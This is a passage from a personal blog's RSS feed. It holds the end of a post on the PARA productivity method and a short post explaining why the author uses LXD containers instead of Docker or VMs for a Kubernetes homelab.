<ol>
<li><p><strong>Organize according to outcomes:</strong> Don't just file things away. Ask yourself, "Does this contribute to my current goals?".</p>
</li>
<li><p><strong>Organize Just-in-Time:</strong> Don't create folders for things you <em>might</em> need. Wait until you actually have something to put in them. Don't add anything until you are ready to work on it.</p>
</li>
<li><p><strong>Keep things informal:</strong> Don't over-engineer it with endless sub-folders. Some messiness is okay. As long as the <strong>Projects</strong> folder is clear, the rest can be a bit looser.</p>
</li>
</ol>
<h4 id="heading-the-anti-hoarding-mindset">The Anti-Hoarding Mindset</h4>
<p>Perhaps the hardest pill to swallow was this: <strong>Don't save everything.</strong> Saving every PDF or post "just in case" leads to digital hoarding that you will never revisit. PARA is meant to organize the life you have <em>now</em>, not the aspirational life you wish you had.</p>
<p>If you are feeling the weight of information overload or FOMO, I highly recommend giving this framework a shot. It helps you focus on one task at a time and actually finish what you start.</p>
<p><a target="_blank" href="https://www.linkedin.com/posts/prakyath-reddy-k_productivity-tiagoforte-paramethod-share-7429855118184914944-81Wd?utm_source=social_share_send&amp;utm_medium=member_desktop_web&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o">LinkedIn Pos</a>t</p>
]]></content:encoded></item><item><title><![CDATA[LXD vs Docker for Homelab]]></title><description><![CDATA[Why I chose LXD over Docker and VMs for my Kubernetes Homelab 🏗️☸️ ?  
I just set-up a 4-server k8s Homelab, and while my first choice was Docker for apps or Multi-pass/VMs for isolation, I went with LXD. Here’s why:  
1. 𝗩𝗠'𝘀 are too "Expensive"...]]></description><link>https://blog.prakyath.dev/lxd-vs-docker-for-homelab</link><guid isPermaLink="true">https://blog.prakyath.dev/lxd-vs-docker-for-homelab</guid><category><![CDATA[Devops]]></category><category><![CDATA[Docker]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Homelab]]></category><category><![CDATA[lxd]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Sun, 15 Feb 2026 16:40:06 GMT</pubDate><content:encoded><![CDATA[<p>Why I chose LXD over Docker and VMs for my Kubernetes Homelab 🏗️☸️ ?  </p>
<p>I just set-up a 4-server k8s Homelab, and while my first choice was Docker for apps or Multi-pass/VMs for isolation, I went with LXD. Here’s why:  </p>
<p>1. 𝗩𝗠'𝘀 are too "Expensive": Running 4 separate kernels wastes massive RAM.<br />Layers: Physical hardware ➡ host OS ➡ Hypervisor(VMware) ➡ Guest OS<br />2. 𝗗𝗼𝗰𝗸𝗲𝗿 is too "Thin": K8s expects to manage a node, not just a process. Docker-in-docker lacks the systemd init and robust networking required for a stable kubeadm environment.<br />Layers: Physical hardware ➡ host OS Kernel (shared) ➡ Docker Engine  </p>
<p>The 𝗟𝗫𝗗 effect:<br />Layers: Physical hardware ➡ host OS Kernel (shared) ➡ LXD ➡ Full Guest OS<br />✅ Real Nodes: Each node has its own users, cron daemon, IP, storage, and systemd—essential for practicing kubeadm deployments.<br />✅ Instant Snapshots: I can snapshot the entire cluster before a risky kubectl upgrade and revert in seconds.<br />✅ Efficiency: I’m running a full 4-node cluster with less overhead than a single heavy Windows VM.  </p>
<p>You can follow my journey through this repository: <a target="_blank" href="https://lnkd.in/g5U-VZ7t"><strong>https://lnkd.in/g5U-VZ7t</strong></a><br /><a target="_blank" href="http://prakyath.dev/"><strong>prakyath.dev</strong></a><br /><a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23kubernetes&amp;origin=HASH_TAG_FROM_FEED"><strong>#Kubernetes</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23k8s&amp;origin=HASH_TAG_FROM_FEED"><strong>#K8s</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23lxd&amp;origin=HASH_TAG_FROM_FEED"><strong>#LXD</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23cloudnative&amp;origin=HASH_TAG_FROM_FEED"><strong>#CloudNative</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23homelab&amp;origin=HASH_TAG_FROM_FEED"><strong>#Homelab</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23ubuntu&amp;origin=HASH_TAG_FROM_FEED"><strong>#Ubuntu</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23devops&amp;origin=HASH_TAG_FROM_FEED"><strong>#DevOps</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23linuxcontainers&amp;origin=HASH_TAG_FROM_FEED"><strong>#LinuxContainers</strong></a></p>
<p>LinkedIn: <a target="_blank" href="https://www.linkedin.com/posts/prakyath-reddy-k_kubernetes-k8s-lxd-activity-7422489779583488000-f2gP?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o">https://www.linkedin.com/posts/prakyath-reddy-k_kubernetes-k8s-lxd-activity-7422489779583488000-f2gP?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o</a></p>
]]></content:encoded></item></channel></rss>